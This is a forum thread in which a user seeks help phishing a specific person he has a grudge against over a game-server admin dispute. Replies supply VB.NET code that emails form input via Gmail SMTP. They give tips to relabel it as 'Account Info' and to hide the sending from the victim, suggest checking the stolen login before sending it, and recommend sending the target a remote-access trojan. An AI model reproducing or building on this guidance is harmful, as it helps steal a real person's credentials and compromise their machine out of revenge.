Need phishers.

Posts 15 of 5 · Page 1 of 1
Need phishers.
Hi Guys, i bought Admin on a server from a guy on game and like 1 week after the removes it blocks me and shit...so i want to give this dude it back so can anyone screw this guy out?
phishing?
Pm me if you can..!!
Code:
Imports System.Net.Mail

'Start by creating a mail message object
Dim MyMailMessage As New MailMessage()

'From requires an instance of the MailAddress type
MyMailMessage.From = New MailAddress("from_address_here@gmanceril.com")

'To is a collection of MailAddress types
MyMailMessage.To.Add("to_address_here@Domain_name_here")

MyMailMessage.Subject = "GMail Test"
MyMailMessage.Body = "This is the test text for Gmail email"

'Create the SMTPClient object and specify the SMTP GMail server
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential("account uid", " account pwd")
SMTPServer.EnableSsl = True

Try
   SMTPServer.Send(MyMailMessage)
   MessageBox.Show("Email Sent")
Catch ex As SmtpException
   MessageBox.Show(ex.Message)
End Try
Found that in 5 seconds.

Change body to your Textboxes, and your subject to "Account Info" or whatever.
Remove the Try Catch, or they'll know your program is sending an email lol.
Couldn't you just remove this line of code instead of removing the entire Try Catch?
Code:
  MessageBox.Show(ex.Message)
Quote Originally Posted by DarkByte7 View Post
Couldn't you just remove this line of code instead of removing the entire Try Catch?
Code:
  MessageBox.Show(ex.Message)
Yeah.
This was only an example.

If I was to use a phisher, I would have it try and login, and if the login fails, it wouldn't send the email.
Phishers are gay anyways, send him a fucking RAT.
Quote Originally Posted by FUKO View Post


Yeah.
This was only an example.

If I was to use a phisher, I would have it try and login, and if the login fails, it wouldn't send the email.
Phishers are gay anyways, send him a fucking RAT.
@FUKO
Do it for me? im not used to this crap.
Posts 15 of 5 · Page 1 of 1

Post a Reply

Similar Threads

Tags for this Thread

None

Need help?